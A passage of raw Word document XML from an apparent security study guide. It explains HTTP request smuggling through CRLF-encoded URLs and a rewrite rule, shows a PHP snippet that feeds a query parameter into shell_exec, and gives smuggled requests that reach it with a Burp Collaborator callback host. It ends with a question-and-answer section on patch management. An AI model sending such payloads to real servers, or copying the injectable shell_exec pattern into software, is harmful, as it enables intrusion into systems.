          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>localhost%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aGET%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>/SMUGGLED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BD7B68" w14:textId="4744E093" w:rsidR="00E56D5A" w:rsidRDefault="00E56D5A" w:rsidP="00E56D5A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FC6EFB" w14:textId="7ED44332" w:rsidR="00E56D5A" w:rsidRDefault="00E56D5A" w:rsidP="00E56D5A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56D5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>and the following request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072672AD" w14:textId="77777777" w:rsidR="00E56D5A" w:rsidRDefault="00E56D5A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>GET /categories/</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20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>HTTP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>1.1</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aHost:%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>localhost%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aGET%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>/SMUGGLED HTTP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Host: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>192.168.1.103</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>User-Agent: Mozilla/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>5.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows NT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>10.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>; Win64; x64) AppleWebKit/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>537.36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> (KHTML, like Gecko) Chrome/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>96.0.4664.45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> Safari/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D874710" w14:textId="19FF9C6A" w:rsidR="00E56D5A" w:rsidRDefault="00E56D5A" w:rsidP="00CC4AAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56D5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Applying the rewrite rule, the request undergoes a transformation into the following format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3F2908" w14:textId="77777777" w:rsidR="000F0E84" w:rsidRDefault="000F0E84">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>/categories.php?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>: localhost</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GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>/SMUGGLED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>: backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380E8105" w14:textId="02C544B6" w:rsidR="00E56D5A" w:rsidRDefault="00CF41B1" w:rsidP="00CC4AAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF41B1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>where the encoded URL is decoded into valid HTTP syntax causing the backend to treat the decoded data as second request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F22632" w14:textId="712C5E01" w:rsidR="00CF41B1" w:rsidRDefault="00CF41B1" w:rsidP="00CC4AAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF41B1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E1F302B" wp14:editId="22314F4E">
            <wp:extent cx="5943600" cy="596265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81859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5234" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="596265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FA41C2" w14:textId="55992737" w:rsidR="00CF41B1" w:rsidRDefault="002E75CC" w:rsidP="00CC4AAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E75CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Suppose that our internal application has the following secret code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518A6788" w14:textId="77777777" w:rsidR="002E75CC" w:rsidRDefault="002E75CC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="888888"/>
        </w:rPr>
        <w:t>#Internal secret functionality</w:t>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>isset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>($_GET[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>'secret'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>])){</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    $secret = $_GET[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>'secret'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shell_exec(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>'nslookup '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> . $secret);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739AC056" w14:textId="65E82C5A" w:rsidR="002E75CC" w:rsidRDefault="0089567F" w:rsidP="00CC4AAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0089567F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>with the following prefix we are able to send the second request to hidden functionallity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F1BD8F" w14:textId="77777777" w:rsidR="0089567F" w:rsidRDefault="0089567F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>HTTP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>\r\nHost: localhost\r\n\r\nGET /categories.php?secret=im8uzc5sbq7xasyxk5yhfc734uaky9.burpcollaborator.net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>HTTP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>1.1</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aHost:%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>localhost%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aGET%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>/categories.php?secret=im8uzc5sbq7xasyxk5yhfc734uaky9.burpcollaborator.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045C67A6" w14:textId="1B50B9B9" w:rsidR="00D8163B" w:rsidRDefault="00D8163B" w:rsidP="0089567F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A1E3C12" w14:textId="77777777" w:rsidR="0087155E" w:rsidRDefault="0087155E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GET /categories/</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20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>HTTP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>1.1</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aHost:%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>localhost%</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>d%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>aGET%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>/categories.php%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>3f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>secret%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>dq0r2dkj0pyl5o0c5ydcptklbi2otci.burpcollaborator.net HTTP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Host: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>192.168.1.103</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>User-Agent: Mozilla/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>5.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows NT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>10.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>; Win64; x64) AppleWebKit/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>537.36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> (KHTML, like Gecko) Chrome/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>96.0.4664.45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> Safari/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6DE133" w14:textId="3E8B0D42" w:rsidR="0089567F" w:rsidRPr="00E132BC" w:rsidRDefault="00E132BC" w:rsidP="00E132BC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00E132BC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65A0DE7F" wp14:editId="5BC20D74">
            <wp:extent cx="5943600" cy="1927860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41679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92010" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1927860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="235A0A9C" w14:textId="79749C99" w:rsidR="009A0FA8" w:rsidRDefault="009A0FA8"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t>What must an IT organization do to ensure that software updates and security patches are implemented timely?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1557F4CD" w14:textId="6370DA23" w:rsidR="00346236" w:rsidRDefault="00346236" w:rsidP="00346236">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FB17F8" w14:textId="77777777" w:rsid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To ensure that software updates and security patches are implemented in a timely manner, an IT organization should consider the following best practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A36DBB7" w14:textId="07459894"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1. Establish a Patch Management Policy: Create a clear and documented patch management policy that outlines the organization's approach to software updates and security patches. Define roles and responsibilities, establish timelines for patch implementation, and outline the procedures for testing, deployment, and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1597C450" w14:textId="77777777" w:rsidR="00FA0F98" w:rsidRPr="00FA0F98" w:rsidRDefault="00FA0F98" w:rsidP="00FA0F98">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A52F9D1"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2. Maintain an Asset Inventory: Maintain an up-to-date inventory of all hardware and software assets within the organization. This inventory should include information about the software versions and their associated vulnerabilities. An accurate asset inventory helps prioritize patching efforts and ensures that all relevant systems are covered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C46AF13" w14:textId="77777777" w:rsidR="00FA0F98" w:rsidRPr="00FA0F98" w:rsidRDefault="00FA0F98" w:rsidP="00FA0F98">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
